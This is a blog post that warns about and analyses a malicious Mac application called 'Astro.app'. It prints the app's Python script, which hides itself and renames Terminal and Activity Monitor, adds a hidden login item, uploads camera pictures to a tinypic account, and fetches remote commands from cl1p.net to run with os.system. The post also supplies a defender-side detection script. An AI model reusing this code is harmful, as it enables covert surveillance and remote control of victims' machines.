New Malicious OS X Script Discovered

Posted on Dec 11, 2008 in Mac

I noticed a post at Mac-Forums.com that seemed a little sketchy. A brand-new user had posted an OS X application with the promise that it “Does really amazing stuff with your camera.”

I downloaded the zip file and took a look inside the “Astro.app” package.

Inside I found a Python script built on the Twill web-browsing library that contained some interesting code… I’ve highlighted some of the salient comments that were included below:

Code:

```python
# Excerpt of the script found inside Astro.app; the imports were added here
# from the calls the excerpt makes. getalbums() is defined elsewhere in the script (not shown).
import getpass
import os
import shutil
import sys
import twill.commands

# Gives paths needed to work on all directories on any comp
user = getpass.getuser()
path2 = sys.argv[0]
aspath = os.path.abspath(os.path.join(path2, '..', '..', '..', '..'))

# Checks to see if it has been run once, if not it renames files so they are hidden
check = os.path.exists(aspath + "/.Astro.app")
if not check:
    os.rename(aspath + "/Astro.app", aspath + "/.Astro.app")
    os.rename("/Applications/Utilities/Terminal.app", "/Applications/Utilities/.Terminal.app")
    os.rename("/Applications/Utilities/Activity Monitor.app", "/Applications/Utilities/.Activity Monitor.app")

path = os.getcwd()  # includes the file's location in the string but not the file; sys.argv[0] includes both the file's location and the file.
# Logs into tinypic
twill.commands.go("http://tinypic.com/")
twill.commands.formclear('1')
twill.commands.fv("1", "email", "M8R-c35y7l@mailinator.com")
twill.commands.fv("1", "password", "toxic0")
twill.commands.submit('5')
if not user in getalbums():
    twill.commands.go("http://tinypic.com/album.php?action=create")
    twill.commands.fv("3", "album-name", user)
    twill.commands.submit()

# Edits startup items so it will run on start
pathd = "/"
user = getpass.getuser()
opensw = open("loginwindow.plist", "w")
opensw.write("""<?xml version="1.0" encoding="UTF-8"?>""")
opensw.write("""\n<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">""")
opensw.write("""\n<plist version="1.0">""")
opensw.write("""\n<dict>""")
opensw.write("""\n <key>AutoLaunchedApplicationDictionary</key>""")
opensw.write("""\n <array>""")
opensw.write("""\n <dict>""")
opensw.write("""\n <key>Hide</key>""")
opensw.write("""\n <true/>""")
opensw.write("""\n <key>Path</key>""")
opensw.write("""\n <string>%s/.Astro.app</string>""" % aspath)
#opensw.write("""\n <string>%s/.kernel.app</string>""" % aspath)
opensw.write("""\n </dict>""")
opensw.write("""\n </array>""")
opensw.write("""\n</dict>""")
opensw.write("""\n</plist>""")
opensw.close()
shutil.move(os.path.join(pathd, "loginwindow.plist"), "/Users/" + user + "/Library/Preferences/")
#os.system("chmod 777 /Users/toXic/Preferences/loginwindow.plist")

# Pulls bash commands off website from grepping in between password and end (password may exist)
def pwn():
    twill.commands.go("http://cl1p.net/commands/")
    b = twill.commands.show()
    c = b.find("""class="ohw">""")
    d = b.find("""stopz""", c)
    data = b[c + 12:d]
    code = "1612"
    if data == code:
        first = b.find("""1612""")
        end = b.find("""end""", first)
        data2 = b[first + 10:end]
        os.system(data2)
```

From what I can tell he’s hiding the application from the user (along with Terminal and Activity Monitor, which are renamed to dot-prefixed names so they vanish from the Finder), registering it as a login item in loginwindow.plist so it runs at every login, and then uploading pictures to his tinypic.com account.

The actual application seems to use QuickTime components, so I’d guess it takes a picture, uploads it to TinyPic and then either takes pictures at regular intervals or is just making the Mac check in so more code can be executed remotely later; the pwn() function already fetches a page from cl1p.net and hands whatever it finds between the markers to os.system.
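As an added defender-side check (not code from the post or from the script itself), this looks for the two traces the script leaves on a machine: a login item in loginwindow.plist that points at a dot-prefixed bundle or is launched with Hide set, and the renamed Terminal and Activity Monitor bundles. The sample plist below is constructed to mirror what the script writes; the path under /Users/alice is an assumption.

```python
import os
import plistlib

# Constructed sample: the loginwindow.plist the script writes, with an assumed user path
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
 <key>AutoLaunchedApplicationDictionary</key>
 <array>
  <dict>
   <key>Hide</key>
   <true/>
   <key>Path</key>
   <string>/Users/alice/Downloads/.Astro.app</string>
  </dict>
 </array>
</dict>
</plist>
"""

# Constructed benign login item for comparison
CLEAN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>
<key>AutoLaunchedApplicationDictionary</key><array><dict><key>Hide</key><false/>
<key>Path</key><string>/Applications/iTunes.app</string></dict></array></dict></plist>"""

def suspicious_login_items(plist_bytes):
    """Return login-item paths that are dot-prefixed bundles or are launched hidden."""
    data = plistlib.loads(plist_bytes)
    hits = []
    for item in data.get("AutoLaunchedApplicationDictionary", []):
        path = item.get("Path", "")
        name = os.path.basename(path.rstrip("/"))
        if name.startswith(".") or item.get("Hide") is True:
            hits.append(path)
    return hits

# Hidden copies the script creates when it renames the two utilities
RENAMED_UTILITIES = [
    "/Applications/Utilities/.Terminal.app",
    "/Applications/Utilities/.Activity Monitor.app",
]

def renamed_utilities_present(root="/"):
    """Return which of the renamed utility bundles exist under root."""
    return [p for p in RENAMED_UTILITIES if os.path.exists(os.path.join(root, p.lstrip("/")))]

if __name__ == "__main__":
    print("suspicious login items:", suspicious_login_items(SAMPLE_PLIST))
    print("renamed utilities:", renamed_utilities_present())
```

On a live machine, feed it ~/Library/Preferences/loginwindow.plist and run the utilities check against the real root; either finding is a strong sign the machine ran this script.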

So if you come across “Astro.app”, BEWARE!

4 Comments

  1. By the way here is the IP of the guy who left the same Virus link on SwitchingToMac.com

    209.234.156.13

  2. Buddy ^ you got that IP way off btw.

  3. Andrew’s just an idiot. He tried so hard to hide the code, and then gave up.

  4. Thanks for the info about this malicious OS X script. It is pretty clever that it goes to a tinypic.com account. I’m looking forward to reading a lot more of your site in the future.